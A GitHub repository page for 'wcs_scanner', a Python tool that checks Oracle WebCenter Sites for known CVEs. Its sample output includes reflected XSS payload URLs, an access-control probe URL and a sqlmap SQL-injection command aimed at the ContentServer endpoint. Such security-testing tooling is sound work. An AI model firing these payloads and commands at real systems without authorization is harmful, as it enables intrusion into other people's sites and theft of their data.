Skip to content

Leovalcante/wcs_scanner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

wcs_scanner

WebCenter Sites Vulnerability Scanner

Scan Oracle WebCenter Sites platform looking for its known vulnerabilities.

Usage

python3 wcs_scanner.py http://example.com

Example output

[!] Start scanning http://example.com
[*] Using proxies={'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}

[*] Look for default login page
[-] Default login page not found

[*] Testing CVE-2018-2791 and CVE-2018-3238 - Multiple XSS
[+] Vulnerable to CVE-2018-2791 (Multiple XSS)
    Payload: http://example.com?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22><script>alert(24)</script>
[+] Vulnerable to CVE-2018-3238 (Multiple XSS)
    Payload: http://example.com?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq%22><script>alert(24)</script>

[*] Testing CVE-2019-2578 - Broken Access Control
[+] Vulnerable to CVE-2019-2578 (Broken Access Control)
    Evidence: http://example.com?pagename=OpenMarket/Xcelerate/Admin/WebReferences

[*] Testing SQL Injection
[+] Vulnerable to CVE-2019-2579 (SQL Injection)
[*] You should test this with sqlmap:
sqlmap --dbms Oracle --url http://example.com/cs/ContentServer --data '_authkey_=...&pagename=OpenMarket/Xcelerate/Admin/WebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=*' --cookie 'JSESSIONID=...' --technique U

Reference:

TODO

Nuclei templates for:

  • cve-2019-2579

Releases

No releases published

Packages

No packages published

Languages